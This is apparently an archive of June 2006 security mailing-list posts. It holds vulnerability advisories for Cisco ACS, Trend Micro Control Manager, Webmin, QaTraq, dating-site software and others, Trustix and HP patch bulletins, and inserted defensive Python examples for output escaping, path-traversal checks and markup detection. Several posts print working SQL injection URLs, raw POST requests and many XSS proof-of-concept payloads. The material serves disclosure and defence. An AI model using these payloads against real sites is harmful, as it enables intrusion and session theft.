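    # Firefox 1.5 / Opera 8.5 keep the byte values; under an 8-bit charset they
    # land in U+0080..U+00FF, which is the "glibberish" the posters report.
    return data.decode("latin-1")


if __name__ == "__main__":
    sample = set_msb(b"<SCRIPT>secret message</SCRIPT>")
    print("raw-bytes filter blocks:  ", naive_filter(sample))
    print("normalising filter blocks:", normalising_filter(sample))
    print("IE6 view:    ", render_as_client(sample, "ie6"))
    print("Firefox view:", render_as_client(sample, "firefox"))
```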



Cisco Secure ACS Weak Session Management Vulnerability

2006-06-23 Thread Darren Bounds

Cisco Secure ACS Weak Session Management Vulnerability
June 23, 2006

Product Overview:
Cisco Secure Access Control Server (ACS) provides a centralized
identity networking solution and simplified user management experience
across all Cisco devices and security management applications.

Cisco Secure ACS is a major component of Cisco trust and identity
networking security solutions. It extends access security by combining
authentication, user and administrator access, and policy control from
a centralized identity networking framework, thereby allowing greater
flexibility and mobility, increased security, and user productivity
gains.

Vulnerability Details:
A vulnerability has been identified in the Cisco Secure ACS session
management architecture which could be exploited by an attacker to
obtain full administrative access to the web interface and thus all
managed assets (routers, switches, 802.1x authenticated networks,
etc).

By default, the Cisco Secure ACS web administration login page runs on
TCP port 2002. Upon successful authentication, the client is then
redirected to a dynamic and unique HTTP server port between 1024 and
65535. Once authenticated, ACS relies solely upon the port and the
client IP address to validate the session.

Clearly one can think of many somewhat trivial techniques for
acquiring the necessary IP address or scenarios where the attacker may
already share the same source IP as the administrator (proxies, NATing
devices). Now it's merely a matter of identifying the port allocated
for the administrative interface. This is easily accomplished as ACS
follows a simple incrementation process for port allocation.

Affected Versions:
Cisco Secure ACS 4.x for Windows
Legacy versions may also be affected.

Workarounds:
Configure ACLs within Cisco Secure ACS to restrict access to the web
interface from only 'secure' network address space.

Cisco has confirmed this vulnerability and is working on a patch.

References:
http://www.cisco.com/en/US/products/sw/secursw/ps2086/index.html


--

Thank you,
Darren Bounds


Dating Agent PRO 4.7.1 Vulnerability

2006-06-23 Thread securityconnection
Dating Agent PRO 4.7.1

http://www.datetopia.com/datingagent/

--

-

PHPinfo page

/requirements.php

-

SQL injection

-

http://target.xx/picture.php?pid=1[SQL]

http://target.xx/mem.php?mid=1[SQL]

http://target.xx/search.php?search=3&sex=1[SQL]

---

POST /search.php HTTP/1.1 

Host: target.xx 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 97 

pictures=1&search=1&Submit2=1&Submit=1&sex=1&age1=1&age2=1&likes=1&maritalstatus=1&relationship='[SQL]

---

Cross Site Scripting (XSS)

---

http://target.xx/webmaster/index.php?login=%22%3E%3Cscript%3Ealert%28%2FElipsis%2BSecurity%2BTest%2F%29%3C%2Fscript%3E&pswd=test

---

POST /search.php HTTP/1.1 

Host: target.xx 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 404

Cookie: PHPSESSID=d83ded192782c72c7f90adbac4127d7d;pass=test

sex=1&age1=1&age2=1&likes=1&maritalstatus=Divorced&relationship=1&pictures=off&onlinet=0&search=&Submit=Search%20%26gt%3B

&login=%22%3E%3Cscript%3Ealert%28%2FElipsis%2BSecurity%2BTest%2F%29%3C%2Fscript%3E&fname=1

-

Ellipsis Security

http://www.ellsec.org


Trend Micro Control Manager (TMCM) Persistent XSS Vulnerability

2006-06-23 Thread Darren Bounds

Trend Micro Control Manager (TMCM) Persistent XSS Vulnerability
June 23, 2006

Product Overview:
Trend Micro Control Manager is a centralized, web-based outbreak
management console designed to simplify enterprise-wide coordination
of outbreak security actions and management of Trend Micro products
and services. Trend Micro Control Manager acts as a central command
center for deployment of Trend Micro's threat-specific expertise
across the network and to select third-party products to proactively
manage outbreaks.

Vulnerability Details:
Trend Micro Control Manager is vulnerable to a persistent,
unauthenticated XSS attack. This vulnerability can be exploited by an
attacker to obtain full administrative access to the TMCM
administration console, compromising the integrity of the corporate
enterprise anti-virus infrastructure.

This vulnerability stems from TMCM's failure to sanitize audit log
content when displaying it through the management console. As such, an
attacker may inject script into the username field at the login page.
Any logins, failed or successful, are then available in the Access Log
for execution when viewed by an authenticated administrative user.

Affected Versions:
Trend Micro Control Manager 3.5
Older versions may also be affected.

Workarounds:
Control network access to the TMCM web console.

References:
http://www.trendmicro.com/en/products/management/tmcm/

Vendor was contacted on several occasions with no response.


--

Thank you,
Darren Bounds
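The pattern described in this advisory, as an added example that is not TMCM's code: an access-log renderer that pastes the username straight into the page (the vulnerable pattern), the same renderer escaping every field at output time, and a detection pass that flags log entries carrying markup. The log entries, field names and table layout are constructed for the example.

```python
import html
import re
from dataclasses import dataclass


@dataclass
class AccessLogEntry:
    timestamp: str
    username: str   # attacker-controlled: copied verbatim from the login form
    source_ip: str
    success: bool


# Constructed sample log (not real TMCM data). A failed login is enough to
# store the second and third usernames, since no authentication happened.
SAMPLE_LOG = [
    AccessLogEntry("2006-06-23 10:01:02", "admin", "10.0.0.5", True),
    AccessLogEntry("2006-06-23 10:03:44", "<script>alert(1)</script>", "10.0.0.9", False),
    AccessLogEntry("2006-06-23 10:05:10", 'bob" onmouseover="alert(2)', "10.0.0.7", False),
]


def _cells(entry):
    return (entry.timestamp, entry.username, entry.source_ip,
            "OK" if entry.success else "FAILED")


def render_row_unsafe(entry):
    """The failure mode: log fields are pasted straight into the markup, so a
    script stored in the username runs in the administrator's browser."""
    return "<tr>" + "".join("<td>%s</td>" % c for c in _cells(entry)) + "</tr>"


def render_row_safe(entry):
    """Escape each untrusted field at output time. quote=True also encodes
    quotes, which is what stops the attribute-breakout payload."""
    return "<tr>" + "".join("<td>%s</td>" % html.escape(c, quote=True)
                            for c in _cells(entry)) + "</tr>"


def render_access_log(entries, safe=True):
    """Return the HTML table the console would show for these entries."""
    render = render_row_safe if safe else render_row_unsafe
    return "<table>" + "".join(render(e) for e in entries) + "</table>"


# Tag delimiters, quotes, a javascript: URL or an on*= handler in a username
# are never legitimate; flag such entries for review.
MARKUP_PATTERN = re.compile(r"[<>\"']|javascript:|\bon\w+\s*=", re.IGNORECASE)


def flag_suspicious_usernames(entries):
    """Detection pass over the log: entries whose username carries markup."""
    return [e for e in entries if MARKUP_PATTERN.search(e.username)]


if __name__ == "__main__":
    print(render_access_log(SAMPLE_LOG, safe=False))
    print(render_access_log(SAMPLE_LOG))
    for e in flag_suspicious_usernames(SAMPLE_LOG):
        print("suspicious username from %s: %r" % (e.source_ip, e.username))
```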


aeDating 4.1 XSS

2006-06-23 Thread securityconnection
Product of AEwebworks Dating Software

http://www.aewebworks.com/

---

Cross Site Scripting (XSS)

---

http://target.xx:80/index.php?Sex=";>alert(/Elipsis+Security+Test/)&Mode=last

^"G4" Template work^

---

POST /join_form.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: target.xx

Content-Length: 1685

page=1&ID=1&ProfileType=">alert(/Elipsis+Security+Test/)&NickName=1&RealName=1&Sex=female&Country=0&City=1&zip=1&Children=0&WhereChildren=

---

POST /forgot.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: target.xx

Content-Length: 65

Email=">alert(/Elipsis+Security+Test/)

-

Ellipsis Security

http://www.ellsec.org



TSLSA-2006-0037 - multi

2006-06-23 Thread Trustix Security Advisor
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Trustix Secure Linux Security Advisory #2006-0037

Package names: kernel, netpbm
Summary:   Multiple vulnerabilities
Date:  2006-06-23
Affected versions: Trustix Secure Linux 2.2
   Trustix Secure Linux 3.0

- --
Package description:
  kernel
  The kernel package contains the Linux kernel (vmlinuz), the core of your
  Trustix Secure Linux operating system.  The kernel handles the basic
  functions of the operating system:  memory allocation, process 
  allocation, device input and output, etc.

  netpbm
  The netpbm package contains a library of functions which support
  programs for handling various graphics file formats, including .pbm
  (portable bitmaps), .pgm (portable graymaps), .pnm (portable anymaps),
  .ppm (portable pixmaps) and others.

Problem description:
  kernel < TSL 3.0 > 
  - New upstream.
  - Module qlogicfc successfully replaced with qla2xxx.
  - Added scsi_transport_spi to initrd module list.
  - SECURITY FIX: A race condition error in the "posix-cpu-timers.c"
script that does not prevent another CPU from attaching the timer
to an exiting process, which could be exploited by attackers to
cause a denial of service.
  - Flaw due to errors in "powerpc/kernel/signal_32.c" and
"powerpc/kernel/signal_32.c", which could allow userspace to
provoke a machine check on 32-bit kernels.
  - An infinite loop in "netfilter/xt_sctp.c", which could be exploited
by attackers to exhaust all available memory resources, creating
a denial of service condition.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2006-2445, CVE-2006-2448 and
CVE-2006-3085 to this issue.

  netpbm < TSL 3.0 > < TSL 2.2 >
  - SECURITY Fix: A vulnerability has been reported in NetPBM, caused due
to an off-by-one boundary error within "pamtofits". This can be
exploited to cause a single byte buffer overflow when processing
a specially crafted input file. 

Action:
  We recommend that all systems with this package installed be upgraded.
  Please note that if you do not need the functionality provided by this
  package, you may want to remove it from your system.


Location:
  All Trustix Secure Linux updates are available from
  http://http.trustix.org/pub/trustix/updates/
  ftp://ftp.trustix.org/pub/trustix/updates/


About Trustix Secure Linux:
  Trustix Secure Linux is a small Linux distribution for servers. With focus
  on security and stability, the system is painlessly kept safe and up to
  date from day one using swup, the automated software updater.


Automatic updates:
  Users of the SWUP tool can enjoy having updates automatically
  installed using 'swup --upgrade'.


Questions?
  Check out our mailing lists:
  http://www.trustix.org/support/


Verification:
  This advisory along with all Trustix packages are signed with the
  TSL sign key.
  This key is available from:
  http://www.trustix.org/TSL-SIGN-KEY

  The advisory itself is available from the errata pages at
  http://www.trustix.org/errata/trustix-2.2/ and
  http://www.trustix.org/errata/trustix-3.0/
  or directly at
  http://www.trustix.org/errata/2006/0037/


MD5sums of the packages:


Trustix Security Team




RE: Bypassing of web filters by using ASCII

2006-06-23 Thread James C. Slora Jr.
Amit Klein wrote Thursday, June 22, 2006 3:47 AM

> So in order to exploit this in HTML over HTTP, the attacker needs to
> either add/modify the Content-Type response header, or to add/modify the
> META tag in the HTML page.

There are other ways that might carry a bigger injection threat:

Style sheet:
http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml
/reference/properties/charset_1.asp

Object property:
http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml
/reference/properties/charset.asp


By extension, it should also work for inline styles.





[security bulletin] HPSBUX02127 SSRT051056 - rev.1 HP-UX Kernel Local Denial of Service (DoS)

2006-06-23 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00705283
Version: 1

HPSBUX02127 SSRT051056 - rev.1 HP-UX Kernel Local Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2006-06-20
Last Updated: 2006-06-21

Potential Security Impact: Local Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX. The
vulnerability could be exploited by a local user to create a Denial of
Service (DoS).

References: none

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.11, B.11.23

BACKGROUND

To determine if an HP-UX system has an affected version, search the output of
"swlist -a revision -l fileset" for one of the filesets listed below. For
affected systems verify that the recommended action has been taken.

AFFECTED VERSIONS

HP-UX B.11.00
==
OS-Core.CORE2-KRN
action: install patch PHKL_34192 or subsequent

HP-UX B.11.11
==
OS-Core.CORE2-KRN
action: install patch PHKL_34193 or subsequent

HP-UX B.11.23
==
OS-Core.CORE2-KRN
action: install patch PHKL_34194 or subsequent

END AFFECTED VERSIONS


RESOLUTION

HP is providing the following patches to resolve this potential vulnerability. 
These patches can be downloaded from http://itrc.hp.com 

PHKL_34192 for B.11.00
PHKL_34193 for B.11.11
PHKL_34194 for B.11.23

MANUAL ACTIONS: No

PRODUCT SPECIFIC INFORMATION 
HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all 
HP-issued Security Bulletins to provide a subset of recommended actions that 
potentially affect a specific HP-UX system. For more information: 
http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA

HISTORY: 
Version: 1 (rev.1) - 21 June 2006 Initial release

Support: For further information, contact normal HP Services
support channel.

Report: To report a potential security vulnerability with any HP
supported product, send Email to: [EMAIL PROTECTED]  It is
strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit
information.  To get the security-alert PGP key, please send an
e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP
Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC

On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
  - check ALL categories for which alerts are required and
continue.
Under Step2: your ITRC operating systems
  - verify your operating system selections are checked and
save.

To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page:
  Subscriber's choice for Business: sign-in.
On the web page:
  Subscriber's Choice: your profile summary
- use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters of the
Bulletin number in the title:

GN = HP General SW,
MA = HP Management Agents,
MI = Misc. 3rd party SW,
MP = HP MPE/iX,
NS = HP NonStop Servers,
OV = HP OpenVMS,
PI = HP Printing & Imaging,
ST = HP Storage SW,
TL = HP Trusted Linux,
TU = HP Tru64 UNIX,
UX = HP-UX,
VV = HP Virtual Vault


System management and security procedures must be reviewed
frequently to maintain system integrity. HP is continually
reviewing and enhancing the security features of software products
to provide customers with current secure solutions.

"HP is broadly distributing this Security Bulletin in order to
bring to the attention of users of the affected HP products the
important security information contained in this Bulletin. HP
recommends that all users determine the applicability of this
information to their individual situations and take appropriate
action. HP does not warrant that this information is necessarily
accurate or complete for all user situations and, consequently, HP
will not be responsible for any damages resulting from user's use
or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all warranties, either
express or implied, including the warranties of merchantability
and fitness for a particular purpose, title and non-infringement."


(c)Copyright 2006 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or
editorial errors or omissions contained herein. The information
provided is provided "as is" without warranty of

[KAPDA]Coppermine 1.4.8~Parameter Cleanup System ByPass~Registering Global Variables

2006-06-23 Thread addmimistrator
ORIGINAL ADVISORY:

http://myimei.com/security/2006-06-20/coppermine-148parameter-cleanup-system-bypassregistering-global-varables.html

VENDOR INFORMED

-----Summary-----

Software: CPG Coppermine Photo Gallery

Software's Web Site: http://coppermine.sourceforge.net/

Versions: 1.4.8.stable

Class: Remote

Status: Unpatched

Exploit: Available

Discovered by: imei addmimistrator

Risk Level: Medium

-----Description-----

Coppermine Photo Gallery has a logical design fault that will result in
bypassing the anti-XSS-Injection/RegGlobal system.



SEE ORIGINAL ADVISORY FOR MORE DETAILS


QaTraq 6.5 RC: Multiple XSS Vulnerabilities

2006-06-23 Thread enji
===

QaTraq 6.5 RC: Multiple XSS Vulnerabilities

===

Technical University of Vienna Security Advisory

TUVSA-0606-001, June 23, 2006

===



Affected applications

--


QaTraq (http://sourceforge.net/projects/qatraq/)


Versions 6.5 RC and prior.



Description




There are a number of reflected XSS vulnerabilities, some of which are also 
stored XSS vulnerabilities and perhaps even SQL injection vulnerabilities. 
The affected program points as well as demo exploits are given below. The 
exploits have been tested with the user being logged in as admin, and 
register_globals being active. It is possible that some vulnerabilities do not 
require register_globals to be enabled, although we have not tested this. Some 
of the parameters in the given sample exploits (mainly "id" params) have to be 
adjusted to the given installation to match existing database entries.


In addition to program points for which exploits are given, we have listed 
about 200 places that are very similar in structure. Although we have not 
explicitly tested them with exploits, we suspect that they are vulnerable as 
well. 


top.inc

-


line 1005

http://localhost/qatraq65rc/queries_view_search.php?link_print='">alert('hi')


line 1007

http://localhost/qatraq65rc/queries_view_search.php?link_upgrade='">alert('hi')


line 1020

http://localhost/qatraq65rc/queries_view_search.php?link_sql='">alert('hi')


line 1041

http://localhost/qatraq65rc/queries_view_search.php?link_next=";>alert('hi')


line 1054

http://localhost/qatraq65rc/queries_view_search.php?link_prev=";>alert('hi')


line 1067

http://localhost/qatraq65rc/queries_view_search.php?link_list=";>alert('hi')



components_copy_content.php

-


line 233

http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1&msg=alert('hi')

[product_id and id (= component id) must exist in the database]


line 238

- use the attack page:

http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1";>










line 260

- analogous to 238:

http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1";>













components_modify_content.php

---


line 213

http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1&msg=alert('hi')


line 218

http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1";>










line 240

http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1";>













components_new_content.php

-


line 188

http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1&msg=alert('hi')


line 193

http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1";>










line 215

http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1";>













design_copy_content.php

-


line 262

- use this page [plan_id must exist in the database]:

http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1";>










line 276

http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1";>










line 313

http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1";>











design_copy_plan_search.php

-


line 106

http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&plan_id=1";>










line 107

http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&plan_id=1";>










design_modify_content.php

---


line 282

http://localhost/qatraq65rc/design_modify_content.php?id=1&plan_id=1";>










line 298

- $new_doc_id is constructed from $major_version and $minor_version on line 
189; these two are only set if POST['version_increment'] is set; use this page 
[and watch for suitable id]:

http://localhost/qatraq65rc/design_modify_content.php?id=7";>










line 311

- $new_version, analogous to 298


line 354

http://localhost/qatraq65rc/design_modify_content.php?id=10";>










design_new_content.php




line 226

http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1";>










line 240

http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1";>










line 276

http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1";>










design_new_search.php

---


line 99

http://localhost/qatraq65rc/design_new_search.php?plan_name=";>alert('hi')


line 100

http://localhost/qatraq65rc/design_new_search.php?plan_desc=";>alert('hi')


download.php

-


line 31

http://localhost/qatraq65rc/download.php?file_name=alert('hi')


login.php

--


line 88

http://localhost/qatraq65rc/login.php?username=";>a

[SNS Advisory No.88] Webmin Directory Traversal Vulnerability

2006-06-23 Thread [EMAIL PROTECTED]
--
SNS Advisory No.88
Webmin Directory Traversal Vulnerability

Problem first discovered on: Sun, 04 Jun 2006
Published on: Fri, 23 Jun 2006
--

Severity Level:
---
  Medium

Overview:
-
  Webmin for Windows contains a directory traversal vulnerability that
  allows remote attackers to download arbitrary files without authentication. 

Problem Description:

  Webmin is a web-based system administration tool for Unix, MacOS X and
  Windows platform.

  Webmin 1.270 and earlier versions do not properly handle "\" (backslash).
  On the Windows platform, this allows attackers to access directories and
  files outside of the public directory.

  In the default configuration of Webmin, authentication is required to
  access almost all directories under the top page. But there are some
  directories where authentication is not required, for example the
  directory which stores the image used before login.

  Therefore, by exploiting the directory traversal vulnerability from these
  directories, remote attackers can download the contents of arbitrary
  files without authentication.

Affected Versions:
--
  Webmin (on Windows) Version 1.270 and earlier versions

Solution:
-
  This problem can be addressed by upgrading Webmin to 1.280 or later.

  http://www.webmin.com/ 

Discovered by:
--
  Keigo Yamazaki (LAC) 

Thanks to:
--
This SNS Advisory is being published in coordination with
Information-technology Promotion Agency, Japan (IPA) and JPCERT/CC. 

  http://jvn.jp/jp/JVN%2367974490/index.html
  http://www.ipa.go.jp/security/vuln/documents/2006/JVN_67974490_webmin.html 

Disclaimer:
---
  The information contained in this advisory may be revised without prior
  notice and is provided as it is. Users shall take their own risk when
  taking any actions following reading this advisory. LAC Co., Ltd.
  shall take no responsibility for any problems, loss or damage caused
  by, or by the use of information provided here.

  This advisory can be found at the following URL:
  http://www.lac.co.jp/business/sns/intelligence/SNSadvisory_e/88_e.html
--
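The backslash handling this advisory describes, as an added example that is not Webmin's code: a resolver that maps a request onto a directory served without authentication, treating "\" as a separator before collapsing ".." segments so a request cannot walk above that directory. The directory name, the request samples and the config.txt target are constructed for the example.

```python
import posixpath
from urllib.parse import unquote


class PathTraversal(ValueError):
    """Raised when a requested path would leave the unauthenticated directory."""


def resolve_public_path(public_root, requested):
    """Map a request path onto a file under public_root, treating '\\' like '/'."""
    # Decode once, as the server does, so that an encoded '..' or '\' is
    # checked in its decoded form rather than slipping past the check encoded.
    path = unquote(requested)
    # The traversal described above works because '\' is not treated as a
    # separator while the Windows filesystem accepts it as one; normalise it
    # to '/' before any segment is examined.
    path = path.replace("\\", "/")
    if "\x00" in path:
        raise PathTraversal("NUL byte in request path")
    parts = []
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if not parts:
                # Walking above public_root is exactly what the attack relies on.
                raise PathTraversal("request escapes %s: %r" % (public_root, requested))
            parts.pop()
            continue
        if ":" in segment:
            # A drive letter (C:) or an NTFS stream (file:stream) would let
            # os.path.join on Windows discard public_root entirely.
            raise PathTraversal("drive or stream syntax in request: %r" % requested)
        parts.append(segment)
    return posixpath.join(public_root, *parts)


def is_inside_public_root(public_root, requested):
    """Boolean form of the check, convenient for request logging."""
    try:
        resolve_public_path(public_root, requested)
        return True
    except PathTraversal:
        return False


# Constructed requests against a hypothetical directory that is served
# without authentication (the image directory in the advisory's example).
PUBLIC_ROOT = "/opt/webmin/images"
SAMPLE_REQUESTS = [
    "logo.gif",                        # plain file: allowed
    "sub/../logo.gif",                 # '..' that stays inside: allowed
    "..\\..\\config.txt",              # backslash traversal: rejected
    "%2e%2e%5c%2e%2e%5cconfig.txt",    # same, percent-encoded: rejected
    "C:/config.txt",                   # drive letter: rejected
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        verdict = "allowed" if is_inside_public_root(PUBLIC_ROOT, req) else "REJECTED"
        print("%-32r -> %s" % (req, verdict))
```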




vlbook 1.2 XSS Bug

2006-06-23 Thread omnipresent
vlBook 1.02 Advisory




Date:

-


2005 June 23


Product:




vlBook 1.02 © 2005


Vendor:

---


http://vlab.info/


Descriptions:

-


The vlbook is a free, open source and light-weight guestbook written in PHP 
using flat files to store messages and settings. It comes with install script 
for quick and effortless installation. Features include a WYSIWYG Editor, 
template based skins, multilingual support, avatars packs and more.


Exploit(s)/Vulnerability(ies):

--


- XSS Vulnerability -


This product is vulnerable to an XSS Attack. The variable message is not 
properly sanitised before being used; so malicious people can inject 
arbitrary XSS code.


PoC of XSS:

---


If an attacker puts in the field "Message*:" this code:


alert("XSS ATTACK")


Further information:




googledorks: Powered by vlBook 1.02 © 2005


Vendor Status:

--


Informed but I've not received a reply.


Credits:



Omnipresent

[EMAIL PROTECTED]


Re: MS Excel Remote Code Execution POC Exploit

2006-06-23 Thread Steven M. Christey

> * Advisories:
> * http://www.microsoft.com/technet/security/advisory/921365.mspx
> * http://www.securityfocus.com/bid/18422/

There are at least three separate Excel issues that were published in
the past week.  These references suggest that it's the "zero-day"
exploit from last Friday (CVE-2006-3059).

However, the Microsoft blog and CERT advisories do not provide any
details about that issue, not even about the bug type.

So, it's not clear to me whether this is really an exploit for last
Friday's zero-day, or if this is actually a brand new vulnerability.

Any clarification would be appreciated.

- Steve


flock d0s exploit remote. beta 1 (v0.7)

2006-06-23 Thread co296
Credits to n00b.. Round 2 of the marquee tag's bug...


I've found a DoS in the Flock web browser that crashes the browser; I've provided a 
proof of concept :P...

 

thnx

 

tested on win xp pro service pack 1..

 

http://www.flock.com/







flock web browser remote dos exploit by n00b :: http://www.flock.com/ ::..














Credits to n00b.. Round {2} of the marquee bugs...